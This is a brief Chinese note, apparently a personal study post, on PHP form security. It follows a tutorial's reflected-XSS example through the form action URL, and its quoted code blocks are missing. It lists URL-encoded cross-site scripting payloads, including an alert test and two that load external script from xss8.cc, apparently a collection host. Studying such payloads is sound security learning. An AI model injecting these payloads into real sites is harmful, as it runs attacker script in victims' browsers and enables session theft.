PHP表单中需引起注重的地方?
现在,我们使用URL来指定提交地址 "test_form.php",以上代码修改为如下所示:

这样做就很好了。
但是,考虑到用户会在浏览器地址栏中输入以下地址:
http://www.runoob.com/test_form.php/%22%3E%3Cscript%3Ealert('hacked')%3C/script%3E
以上的 URL 中,将被解析为如下代码并执行:
如果测试其他的呢?例如:
%22%3E%3Cscript%3Ealert('hacked')%3C/script%3E

%3c%2ftExtArEa%3e%27%22%3e%3csCRiPt+sRC%3dhttps%3a%2f%2fxss8.cc%2fcOpN%3e%3c%2fsCrIpT%3e
%3csCRiPt%2fSrC%3d%2f%2fhttps%3a%2f%2fxss8.cc%2fcOpN%3e
https://xss8.cc/cOpN
以上测试后发现存在许多问题,之后再探究
10-12 06:45